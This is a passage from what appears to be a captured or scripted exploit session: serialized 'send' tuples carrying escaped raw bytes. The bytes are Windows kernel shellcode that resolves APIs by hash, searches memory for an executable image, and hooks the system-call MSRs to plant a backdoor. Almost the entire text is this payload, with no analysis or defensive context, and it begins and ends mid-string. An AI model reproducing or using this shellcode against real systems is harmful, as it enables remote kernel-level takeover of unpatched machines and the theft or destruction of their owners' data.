x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 7, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\